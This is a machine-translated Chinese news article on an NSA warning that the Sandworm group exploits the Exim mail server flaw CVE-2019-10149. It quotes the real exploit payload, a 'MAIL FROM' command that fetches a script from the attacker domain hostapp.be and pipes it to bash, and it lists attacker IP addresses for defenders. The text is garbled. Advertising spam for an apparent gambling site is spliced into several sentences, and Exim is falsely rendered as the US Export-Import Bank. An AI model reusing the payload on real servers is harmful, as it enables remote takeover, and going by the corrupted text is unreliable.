一个俄罗斯黑客组织正在利用一个漏洞，沐鸣开户测速控制美国政府及其合作伙伴的电脑。该黑客组织与乌克兰电网攻击、世界上最具破坏性的数据雨刷蠕虫以及克里姆林宫的其他邪恶行动有关。

 

在周四发表的一份报告中，美国国家安全局(nsa)表示，沙虫集团正在积极利用美国进出口银行(Exim)的一个漏洞。这个关键的错误被跟踪为CVE-2019-10149，它使得未经身份验证的远程攻击者可以发送特殊设计的电子邮件来执行具有根特权的命令。这样，攻击者就可以安装自己选择的程序、修改数据和创建新帐户。

 

CVE-2019-10149补丁从去年6月开始提供。至少从8月份开始，这些袭击就一直很活跃。国家安全局官员写道:

 

参与者通过在SMTP(简单邮件传输协议)消息的“MAIL FROM”字段中发送命令，在面向公众的mta上使用Exim软件剥削受害者。下面是一个示例，沐鸣开户测速其中包含参与者每次部署都会修改的参数。

 

MAILFROM: < ${{运行\ x2Fbin \ x2Fsh \ tc \ t \ x22exec \ x20的\ x2Fusr \ x2Fbin \ x2Fwget \ x20 \ x2DO \ x20的\ x2D \ x20http \: \ x2F \ x2F \ hostapp.be \ x2Fscript1。sh \ x20的\ x7C \ x20bash \将}}@hostapp.be >

 

十六进制解码命令:

 

/bin/sh -c "exec /usr/bin/wget - o - http://hostapp.be/script1.sh| bash"

 

图1:示例“MAIL FROM”剥削命令

 

当成功利用CVE-2019-10149时，参与者可以执行他们选择的代码。当Sandworm利用CVE-2019-10149时，受害计算机随后将从Sandworm控制的域下载并执行一个shell脚本。此脚本将尝试在受害计算机上执行以下操作:添加特权用户禁用网络安全设置、更新SSH配置以启用其他远程访问、执行其他脚本以启用后续开发。

 

周四的公告说，黑客为一个名为“特殊技术中心”(Main Center for Special Technologies)的特定部门工作，该部门隶属于俄罗斯情报总局(GRU)。安全研究人员普遍认为，近年来一些最具野心和破坏性的网络攻击，都是由该部门的黑客组织实施的。

 

例子包括:

 

2015年和2016年的黑客攻击导致乌克兰断电

 

“NotPetya”病毒的释放，这是一种数据清除蠕虫病毒，它在数小时内传遍全世界，沐鸣开户测速给政府和企业造成了数百亿美元的损失

 

2018年初的一次恶意软件攻击关闭了冬奥会的关键部分

 

连线记者安迪·格林伯格最近出版了一本名为《沙虫》的书，记录了黑客攻击和他们利用的地缘政治紧张局势。

 

Exim邮件服务器漏洞于去年6月曝光，与此同时，开发人员发布了一个安全补丁。报告说，远程攻击通常要求易受攻击的系统不再使用默认设置运行。然而，在一种情况下，当攻击者通过每隔几分钟传输一个字节来保持与易受攻击的服务器的连接打开七天，那么对默认系统的远程攻击是可能的。

 

周四的公告没有说明有多少服务器被成功定位，以及它们所处的地理位置或行业。即便如此，美国国家安全局通常也不会发出此类警告，除非有理由担心。

 

负责Exim服务器的人员应该检查他们运行的版本是4.92或更高。出于极大的谨慎，管理员还应该检查系统日志中到95.216.13.196、103.94.157.5和hostapp的连接。都与正在进行的沙虫运动有关。